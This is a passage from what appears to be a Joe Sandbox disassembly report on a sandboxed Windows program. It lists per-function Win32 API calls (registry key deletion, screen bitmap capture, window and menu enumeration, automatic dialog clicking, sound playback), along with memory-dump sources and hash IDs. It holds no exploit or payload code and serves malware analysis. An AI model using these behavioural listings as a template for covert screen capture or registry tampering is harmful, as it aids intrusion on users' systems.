                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00A1C26A
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00A1C2DE
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00A1C2FC
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A1C352
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A1C364
                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A1C382
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00A1C3E3
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A1C3F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                  • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                  • Opcode ID: 3b1c6f0891a68ba4c681e38e8984ae8ef3bf71103180a6f4366c05cd935aa2c1
                                                                                                                                                                                                                                  • Instruction ID: 704bafcadbb3186cae647098ab03cac3776cc6501bdb0a1d77db3daa820d09f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b1c6f0891a68ba4c681e38e8984ae8ef3bf71103180a6f4366c05cd935aa2c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7C1A031208201EFD710DF58C495FAABBE5BF84314F14859CF46A8B6A2CB35ED86CB91
                                                                                                                                                                                                                                  Function 00A12FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00A13035
                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A13045
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00A13051
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00A1305E
                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A130CA
                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A13109
                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A1312D
                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00A13135
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00A1313E
                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00A13145
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00A13150
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                  • Opcode ID: 4854f8b4b878710e4bed85ec5623d0fcfa36ec4e6b5bcfce56f2605104a33712
                                                                                                                                                                                                                                  • Instruction ID: c40cc38be54980363218cf0e15e40bc546ecc0f4e9df2407c6bbc01792b55e29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4854f8b4b878710e4bed85ec5623d0fcfa36ec4e6b5bcfce56f2605104a33712
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7161D2B6D00219AFCF14CFE8D984AAEBBF5FF48310F208529E559A7250D771A952CF90
                                                                                                                                                                                                                                  Function 00A2A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00A2A990
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00A2A9A7
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00A2A9B3
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00A2A9C9
                                                                                                                                                                                                                                  • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00A2AC15
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00A2AC33
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00A2AC54
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00A2AC73
                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00A2AC95
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?), ref: 00A2ACBB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 5eaf22612b144409fcf9af6b0acd517f80a6d03642c9227a69226c27bb3f8171
                                                                                                                                                                                                                                  • Instruction ID: 87adf6f5fda00e9d603b5bc529e10740794d223141b5657b0ca5dc0402617452
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eaf22612b144409fcf9af6b0acd517f80a6d03642c9227a69226c27bb3f8171
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32B17931600229EFDF14CFADD9847BE7BB2BF54700F188079ED45AA296D770A981CB61
                                                                                                                                                                                                                                  Function 009F52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 009F52E6
                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 009F5328
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009F5339
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 009F5345
                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 009F537A
                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 009F53B2
                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 009F53EB
                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 009F5445
                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 009F5477
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009F54EF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                  • String ID: ThumbnailClass
                                                                                                                                                                                                                                  • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                  • Opcode ID: 9e9171be04c3927ed23a6b0a535747982edc533540d04df8327827ca2ab871a2
                                                                                                                                                                                                                                  • Instruction ID: 60c3621bfeee3cc3ca0f28dc9e86136bb7cbbcf663d0cd1ef3bea533ee37ea5a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e9171be04c3927ed23a6b0a535747982edc533540d04df8327827ca2ab871a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB91C171104A0AAFDB14DF28D984BBAB7ADFF40304F114529FB9A82091EB71ED56CB91
                                                                                                                                                                                                                                  Function 00A2976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A297B6
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00A297C6
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00A297D1
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00A29879
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A2992B
                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00A29948
                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00A29958
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A2998A
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A299CC
                                                                                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A299FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                  • Opcode ID: 3474e7bed99dbcc41b0827c7558774f7ad69efb3ed21ff836953b63262b472bf
                                                                                                                                                                                                                                  • Instruction ID: 16807a39ea782df2a6fdc50daf688f2f07cc2e949b4aa446fc3844b2e4fea267
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3474e7bed99dbcc41b0827c7558774f7ad69efb3ed21ff836953b63262b472bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC81C1715083219FD720CF28E984AAB7BE8FF89B54F04053DF98597291D770D906CBA2
                                                                                                                                                                                                                                  Function 009FC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(00A629C0,000000FF,00000000,00000030), ref: 009FC973
                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(00A629C0,00000004,00000000,00000030), ref: 009FC9A8
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 009FC9BA
                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 009FCA00
                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 009FCA1D
                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 009FCA49
                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 009FCA90
                                                                                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009FCAD6
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009FCAEB
                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009FCB0C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                  • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                  • Opcode ID: 797c34c337b406ace1900f68ab2d1b884313a59c22a460d9ef00bf7e47217c0a
                                                                                                                                                                                                                                  • Instruction ID: 149040a5e6a8634d6affe59be123ee8c9f5815593e3dfff9c2d5cf4c511fccaa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 797c34c337b406ace1900f68ab2d1b884313a59c22a460d9ef00bf7e47217c0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF618FB090024DAFDF21CFA8DA89AFE7BB8FB45348F148455EA11A7251D774ED42CB60
                                                                                                                                                                                                                                  Function 009FE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009FE4D4
                                                                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009FE4FA
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FE504
                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 009FE554
                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 009FE570
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                  • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                  • Opcode ID: af2a36d99fc9f59691561e7420bd853ca78c4a4d6d00439c62e46ebc03b94dc2
                                                                                                                                                                                                                                  • Instruction ID: 50d54d3d2c310c115a52833d8fc08b9986709279116723a060b516f8dd7ca796
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af2a36d99fc9f59691561e7420bd853ca78c4a4d6d00439c62e46ebc03b94dc2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C41E57290421C7AEB14AB789D47FFF77ACEF95720F100465FA00E6092EB799A0193A5
                                                                                                                                                                                                                                  Function 00A1D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A1D6C4
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A1D6ED
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A1D7A8
                                                                                                                                                                                                                                    • Part of subcall function 00A1D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A1D70A
                                                                                                                                                                                                                                    • Part of subcall function 00A1D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A1D71D
                                                                                                                                                                                                                                    • Part of subcall function 00A1D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A1D72F
                                                                                                                                                                                                                                    • Part of subcall function 00A1D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A1D765
                                                                                                                                                                                                                                    • Part of subcall function 00A1D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A1D788
                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A1D753
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                  • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                  • Opcode ID: e6de34f3029fa05f935a2bf83c63499c9d794e51b25ababea96ace399b7dae4a
                                                                                                                                                                                                                                  • Instruction ID: d7c80cbcb2b19c3ecd8cb0af78c7cfd664714dbd9e2f1bc19408578489d1dec0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6de34f3029fa05f935a2bf83c63499c9d794e51b25ababea96ace399b7dae4a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC318D72A01128BBDB20DB94DC88EFFBB7CEF46750F040565B806E2151DB349E869AA0
                                                                                                                                                                                                                                  Function 009FEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • timeGetTime.WINMM ref: 009FEFCB
                                                                                                                                                                                                                                    • Part of subcall function 009AF215: timeGetTime.WINMM(?,?,009FEFEB), ref: 009AF219
                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 009FEFF8
                                                                                                                                                                                                                                  • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 009FF01C
                                                                                                                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 009FF03E
                                                                                                                                                                                                                                  • SetActiveWindow.USER32 ref: 009FF05D
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 009FF06B
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 009FF08A
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 009FF095
                                                                                                                                                                                                                                  • IsWindow.USER32 ref: 009FF0A1
                                                                                                                                                                                                                                  • EndDialog.USER32(00000000), ref: 009FF0B2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                  • Opcode ID: 963f8d454afd8d9c515b2018848c63140af43ad4b842c842757d4b7ff1f89ac3
                                                                                                                                                                                                                                  • Instruction ID: 70c28c76bcd3fc6806ef0cc1bd1522e0746ca1d98c3753543cf88d3b5b91de2d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 963f8d454afd8d9c515b2018848c63140af43ad4b842c842757d4b7ff1f89ac3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA218E76540208BFEB20AFA4EC89B367B79FB59745B044034FA01822B3EBB58C038B51
                                                                                                                                                                                                                                  Function 009FF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009FF374
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009FF38A
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009FF39B
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009FF3AD
                                                                                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009FF3BE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SendString$_wcslen
